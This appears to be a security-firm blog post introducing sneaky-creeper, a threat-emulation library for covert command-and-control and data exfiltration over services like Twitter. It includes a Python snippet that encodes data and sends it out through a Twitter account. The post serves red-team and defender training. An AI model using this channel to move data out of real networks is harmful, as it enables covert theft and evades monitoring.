Can we C2? Yes we can!

Dakota Nelson //

It’s become more and more common lately to see advanced attackers using legitimate internet channels to move data in and out of networks. Social networks such as Twitter and Tumblr, utilities such as Dropbox and Soundcloud, and even business tools such as Salesforce and Google Docs can all be used as channels for command and control. Threat intelligence reports, such as this one from FireEye, can provide insight into the tactics, techniques, and procedures of these opponents, but they don’t provide the hands-on experience that network defenders need to prepare against these types of real-world threats.

That’s where new offensive tools come in.

Like everyone here at BHIS, I love security. In my case, this translates to a lot of late nights hammering out software – such as sneaky-creeper, an open source project designed to enable easy communication over legitimate internet channels for the purpose of threat emulation.

It’s designed to be readable and easy to use:

“`python
from sneakers import Exfil

# channels actually move data
channel = “twitter”

# encoders let you encrypt/encode/mess with the data before you send it
encoders = [“b64”]
# note that they can be chained!

# contains the API keys and details for the account you’ll post to
twitter_params = {“key”: “xxxx”,
“secret”: “xxxx”,
“token”: “xxxx”,
“tsecret”: “xxxx”,
“name”: “twitter_account_name”}

data = “whatever you’d like”

feed = Exfil(channel, encoders)

feed.set_channel_params({“sending”: twitter_params, “receiving”: twitter_params})

feed.send(data)

print(feed.receive())
“`
And that’s it! Sneaky-creeper itself is simply a communications library – data goes in, data comes out – but a proof-of-concept implant is just getting off the ground to demonstrate its potential.

Sneaky-creeper is built and maintained by a team of students, and is still a work in progress – while it’s a little rough around the edges, it’s constantly being refined and improved to provide a robust communications channel to emulate advanced attacker communications capabilities. If you’re interested in unusual C&C methods, check it out on Github!

_______

See more from Dakota at his blog Ungineers.com